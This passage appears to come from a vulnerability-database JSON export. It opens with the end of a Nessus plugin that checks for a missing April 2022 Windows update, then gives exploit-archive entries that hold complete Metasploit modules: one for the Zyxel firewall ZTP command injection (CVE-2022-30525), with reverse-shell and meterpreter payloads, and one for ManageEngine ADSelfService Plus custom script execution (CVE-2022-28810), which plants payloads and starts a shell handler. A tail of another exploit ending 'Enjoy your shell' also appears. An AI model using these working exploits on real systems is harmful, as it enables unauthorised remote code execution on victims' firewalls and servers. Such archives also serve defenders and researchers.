(CVE-2022-26824, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, \n CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, \n CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, \n CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, \n CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, \n CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, \n CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-26816, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012647\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012647\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012647'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012647])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": 
{"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:04", "description": "The remote Windows host is missing security update 5012604.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26786, CVE-2022-26787, CVE-2022-26827, CVE-2022-26789, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26828, CVE-2022-26808, CVE-2022-26788, CVE-2022-26790, CVE-2022-24549, CVE-2022-26914, CVE-2022-26798, CVE-2022-26795, CVE-2022-26793, CVE-2022-26796, CVE-2022-26904, CVE-2022-26807, CVE-2022-26797, CVE-2022-26794, CVE-2022-26792, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831, CVE-2022-24538, CVE-2022-24484, CVE-2022-23268, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26917, CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26919, CVE-2022-26820, CVE-2022-26830, CVE-2022-26818, CVE-2022-26815, CVE-2022-26809, CVE-2022-26814, CVE-2022-26822, CVE-2022-26829, CVE-2022-26819, CVE-2022-26918, CVE-2022-26826, CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-26920, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012604: Windows Server 2022 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", 
Enjoy your shell !!!\") \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167372/zyxelusgflex521-exec.txt"}, {"lastseen": "2022-05-16T15:02:03", "description": "", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "packetstorm", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "PACKETSTORM:167182", "href": "https://packetstormsecurity.com/files/167182/Zyxel-Firewall-ZTP-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits CVE-2022-30525, an unauthenticated remote \ncommand injection vulnerability affecting Zyxel firewalls with zero \ntouch provisioning (ZTP) support. By sending a malicious setWanPortSt \ncommand containing an mtu field with a crafted OS command to the \n/ztp/cgi-bin/handler page, an attacker can gain remote command execution \nas the nobody user. 
\n \nAffected Zyxel models are: \n \n* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below \n* USG20-VPN and USG20W-VPN using firmware 5.21 and below \n* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'jbaines-r7' # Vulnerability discovery and Metasploit module \n], \n'References' => [ \n[ 'CVE', '2022-30525' ], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/'] \n], \n'DisclosureDate' => '2022-04-28', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_MIPS64,], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Shell Dropper', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_MIPS64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'curl', 'wget' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \n# Checks the build date that is embedded in the landing page. If it finds a build \n# date older than April 20, 2022 then it will additionally check if the model is \n# a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this \n# seems like a reasonable approach. 
\ndef check \nres = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/')) \nunless res \nreturn CheckCode::Unknown('The target failed to respond to check.') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Failed to retrieve /') \nend \n \nver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date] \nif ver.nil? \nreturn CheckCode::Safe('Could not extract a version number') \nend \n \nif ver[0..5].to_i < 220420 \nmodel = res.get_html_document.xpath('//title').text \nif model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN')) \nreturn CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\") \nend \nend \n \nCheckCode::Safe(\"This determination is based on the build date string: #{ver}.\") \nend \n \ndef execute_command(cmd, _opts = {}) \nhandler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler') \nprint_status(\"Sending command to #{handler_uri}\") \n \n# this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too \n# but it's more involved. \nhttp_payload = { \n'command' => 'setWanPortSt', \n'proto' => 'dhcp', \n'port' => Rex::Text.rand_text_numeric(4).to_s, \n'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s, \n'vlanid' => Rex::Text.rand_text_numeric(4).to_s, \n'mtu' => \";#{cmd};\", \n'data' => '' \n} \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => handler_uri, \n'headers' => \n{ \n'Content-Type' => 'application/json; charset=utf-8' \n}, \n'data' => http_payload.to_json \n}) \n# Successful exploitation can result in no response (connection being held open by a reverse shell) \n# or, if the command executes immediately, a response with a 503. \nif res && res.code != 503 \nfail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. 
No reply was expected.\") \nend \nprint_good('Command successfully executed.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167182/zyxel_ztp_rce.rb.txt"}], "zdt": [{"lastseen": "2022-04-26T21:33:07", "description": "This Metasploit module exploits the \"custom script\" feature of ADSelfService Plus. The feature was removed in build 6122 as part of the patch for CVE-2022-28810. For purposes of this module, a \"custom script\" is arbitrary operating system command execution. This module uses an attacker provided \"admin\" account to insert the malicious payload into the custom script fields. When a user resets their password or unlocks their account, the payload in the custom script will be executed. The payload will be executed as SYSTEM if ADSelfService Plus is installed as a service, which we believe is the normal operational behavior. This is a passive module because user interaction is required to trigger the payload. This module also does not automatically remove the malicious code from the remote target. 
Use the \"TARGET_RESET\" operation to remove the malicious custom script when you are done.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Custom Script Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-21T00:00:00", "id": "1337DAY-ID-37661", "href": "https://0day.today/exploit/description/37661", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',\n 'Description' => %q{\n This module exploits the \"custom script\" feature of ADSelfService Plus. 
The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"\n },\n 'Author' => [\n # Discovered and exploited by unknown threat actors\n 'Jake Baines', # Analysis, CVE credit, and Metasploit module\n 'Hernan Diaz', # Analysis and CVE credit\n 'Andrew Iwamaye', # Analysis and CVE credit\n 'Dan Kelley' # Analysis and CVE credit\n ],\n 'References' => [\n ['CVE', '2022-28810'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']\n ],\n 'DisclosureDate' => '2022-04-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true, # false if ADSelfService Plus is not run as a service\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888,\n 'DisablePayloadHandler' => true,\n 'JJS_PATH' => 
'..\\\\jre\\\\bin\\\\jjs.exe'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),\n OptString.new('USERNAME', [true, 'The administrator username', 'admin']),\n OptString.new('PASSWORD', [true, 'The administrator user\\'s password', 'admin']),\n OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])\n ])\n end\n\n ##\n # Because this is an authenticated vulnerability, we will rely on a version string\n # for the check function. We can extract the version (or build) from selfservice/index.html.\n ##\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /selfservice/index.html')\n end\n\n ver = res.body[/\\.css\\?buildNo=(?<build_id>[0-9]+)/, :build_id]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if Rex::Version.new(ver) < Rex::Version.new('6122')\n return CheckCode::Appears(\"This determination is based on the version string: #{ver}.\")\n end\n\n CheckCode::Safe(\"This determination is based on the version string: #{ver}.\")\n end\n\n ##\n # Authenticate with the remote target. Login requires four steps:\n #\n # 1. Grab a CSRF token\n # 2. Post credentials to /ServletAPI/accounts/login\n # 3. Post credentials to /j_security_check\n # 4. 
Grab another CSRF token for authenticated requests\n #\n # @return a new CSRF token to use with authenticated requests\n ##\n def authenticate\n # grab a CSRF token from the index\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })\n fail_with(Failure::Unreachable, 'The target did not respond') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n # send the first login request to get the ssp token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n\n # send the second login request to get the sso token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/j_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302\n\n # revisit authorization.do to complete authentication\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 
'keep_cookies' => true })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n print_good('Authentication successful')\n csrf_tok\n end\n\n ##\n # Triggering the payload requires user interaction. Using the default payload\n # handler will cause this module to exit after planting the payload, so the\n # module will spawn it's own handler so that it doesn't exit until a shell\n # has been received/handled. Note that this module is passive so it should\n # just be chilling quietly in the background.\n #\n # This code is largely copy/paste from windows/local/persistence.rb\n ##\n def create_multihandler(lhost, lport, payload_name)\n pay = framework.payloads.create(payload_name)\n pay.datastore['LHOST'] = lhost\n pay.datastore['LPORT'] = lport\n print_status('Starting exploit/multi/handler')\n\n # Set options for module\n mh = framework.exploits.create('multi/handler')\n mh.share_datastore(pay.datastore)\n mh.datastore['PAYLOAD'] = payload_name\n mh.datastore['EXITFUNC'] = 'thread'\n mh.datastore['ExitOnSession'] = true\n # Validate module options\n mh.options.validate(mh.datastore)\n # Execute showing output\n mh.exploit_simple(\n 'Payload' => mh.datastore['PAYLOAD'],\n 'LocalInput' => user_input,\n 'LocalOutput' => user_output,\n 'RunAsJob' => true\n )\n\n # Check to make sure that the handler is actually valid\n # If another process has the port open, then the handler will fail\n # but it takes a few seconds to do so. 
The module needs to give\n # the handler time to fail or the resulting connections from the\n # target could end up on on a different handler with the wrong payload\n # or dropped entirely.\n Rex.sleep(5)\n return nil if framework.jobs[mh.job_id.to_s].nil?\n\n return mh.job_id.to_s\n end\n\n # The json policy blob that ADSSP provides us is not accepted by ADSSP\n # if we try to POST it back. Specifically, ADSP is very unhappy about all\n # the booleans using \"true\" or \"false\" instead of \"1\" or \"0\" *except* for\n # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but\n # here we are.\n def fix_adssp_json(json_hash)\n json_hash.map do |key, value|\n if value.is_a? Hash\n [key, fix_adssp_json(value)]\n elsif value.is_a? Array\n value = value.map do |array_val|\n if array_val.is_a? Hash\n array_val = fix_adssp_json(array_val)\n end\n array_val\n end\n [key, value]\n elsif key == 'HIDE_CAPTCHA_RPUA'\n [key, value]\n elsif value.is_a? TrueClass\n [key, 1]\n elsif value.is_a? FalseClass\n [key, 0]\n else\n [key, value]\n end\n end.to_h\n end\n\n def exploit\n csrf_tok = authenticate\n\n # Grab the list of configured policies\n policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')\n print_status(\"Requesting policy list from #{policy_list_uri}\")\n res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })\n fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200\n policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if policy_json.nil?\n policy_details_json = policy_json['POLICY_DETAILS']\n fail_with(Failure::UnexpectedReply, \"The target didn't have any configured policies\") if policy_details_json.nil?\n\n # There can be multiple policies. 
This logic will loop over each one, grab the configuration\n # details, update the configuration to include our payload, and then POST it back.\n policy_details_json.each do |policy_entry|\n policy_id = policy_entry['POLICY_ID']\n policy_name = policy_entry['POLICY_NAME']\n fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?\n\n print_status(\"Requesting policy details for #{policy_name}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),\n 'vars_get' =>\n {\n 'POLICY_ID' => policy_id\n }\n })\n fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200\n\n # load the JSON and insert (or remove) our payload\n specific_policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if specific_policy_json.nil?\n fail_with(Failure::UnexpectedReply, \"The target didn't contain the expected JSON\") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?\n new_payload = \"cmd.exe /c #{payload.encoded}\"\n\n if datastore['TARGET_RESET']\n print_status('Disabling custom script functionality')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = ''\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''\n else\n print_status('Enabling custom scripts and inserting the payload')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload\n end\n\n # fix up the ADSSP provided json so ADSSP will accept it o.O\n updated_policy = fix_adssp_json(specific_policy_json).to_json\n\n policy_update_uri = normalize_uri(target_uri.path, 
'/ServletAPI/configuration/policyConfig/setAPCDetails')\n print_status(\"Posting updated policy configuration to #{policy_update_uri}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => policy_update_uri,\n 'vars_post' =>\n {\n 'APC_SETTINGS_DETAILS' => updated_policy,\n 'POLICY_NAME' => policy_name,\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200\n\n # spawn our own payload handler?\n if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']\n listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])\n if listener_job_id.blank?\n print_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\")\n end\n else\n print_good('Done!')\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37661", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T21:37:30", "description": "This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. 
Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T00:00:00", "type": "zdt", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "1337DAY-ID-37733", "href": "https://0day.today/exploit/description/37733", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits CVE-2022-30525, an 
